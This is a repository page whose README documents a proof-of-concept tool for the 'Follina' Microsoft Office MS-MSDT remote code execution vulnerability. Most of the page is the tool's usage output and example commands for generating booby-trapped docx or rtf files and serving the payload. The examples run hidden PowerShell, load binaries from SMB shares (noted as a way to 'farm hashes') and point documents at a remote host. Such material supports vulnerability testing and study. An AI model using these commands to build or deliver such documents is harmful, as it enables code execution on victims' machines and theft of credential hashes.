• Stars
    star
    1,119
  • Rank 41,531 (Top 0.9 %)
  • Language Smarty
  • Created over 2 years ago
  • Updated over 1 year ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

POC to replicate the full 'Follina' Office RCE vulnerability for testing purposes

'Follina' MS-MSDT n-day Microsoft Office RCE

Quick POC to replicate the 'Follina' Office RCE vulnerability for local testing purposes. Running the script will generate a clickme.docx (or clickme.rtf) payload file in your current working directory, and start a web server with the payload file (www/exploit.html). The payload and web server parameters are configurable (see help and examples).

⚠ DO NOT USE IN PRODUCTION LEST YOU BE REGARDED A DUMMY

Usage:

$ python .\follina.py -h
usage: follina.py [-h] -m {command,binary} [-b BINARY] [-c COMMAND] -t {rtf,docx} [-u URL] [-H HOST] [-P PORT]

options:
  -h, --help            show this help message and exit

Required Arguments:
  -m {command,binary}, --mode {command,binary}
                        Execution mode, can be "binary" to load a (remote) binary, or "command" to run an encoded PS command

Binary Execution Arguments:
  -b BINARY, --binary BINARY
                        The full path of the binary to run. Can be local or remote from an SMB share

Command Execution Arguments:
  -c COMMAND, --command COMMAND
                        The encoded command to execute in "command" mode

Optional Arguments:
  -t {rtf,docx}, --type {rtf,docx}
                        The type of payload to use, can be "docx" or "rtf"
  -u URL, --url URL     The hostname or IP address where the generated document should retrieve your payload, defaults to "localhost". Disables web server if custom URL scheme or path are specified
  -H HOST, --host HOST  The interface for the web server to listen on, defaults to all interfaces (0.0.0.0)
  -P PORT, --port PORT  The port to run the HTTP server on, defaults to 80

Examples:

# Execute a local binary
python .\follina.py -t docx -m binary -b \windows\system32\calc.exe

# On linux you may have to escape backslashes
python .\follina.py -t rtf -m binary -b \\windows\\system32\\calc.exe

# Execute a binary from a file share (can be used to farm hashes πŸ‘€)
python .\follina.py -t docx -m binary -b \\localhost\c$\windows\system32\calc.exe

# Execute an arbitrary powershell command
python .\follina.py -t rtf -m command -c "Start-Process c:\windows\system32\cmd.exe -WindowStyle hidden -ArgumentList '/c echo owned > c:\users\public\owned.txt'"

# Run the web server on the default interface (all interfaces, 0.0.0.0), but tell the malicious document to retrieve it at http://1.2.3.4/exploit.html
python .\follina.py -t docx -m binary -b \windows\system32\calc.exe -u 1.2.3.4

# Only run the webserver on localhost, on port 8080 instead of 80
python .\follina.py -t rtf -m binary -b \windows\system32\calc.exe -H 127.0.0.1 -P 8080

Cool peeps

Thanks to Kevin Beaumont for his original analysis of the issue, @KevTheHermit for sharing their poc, and John Hammond for their further work on analysing payload requirements. Additional thanks to @mkolsek for the template supporting Office 2019, and @theluemmel for sharing their version of the payload with me.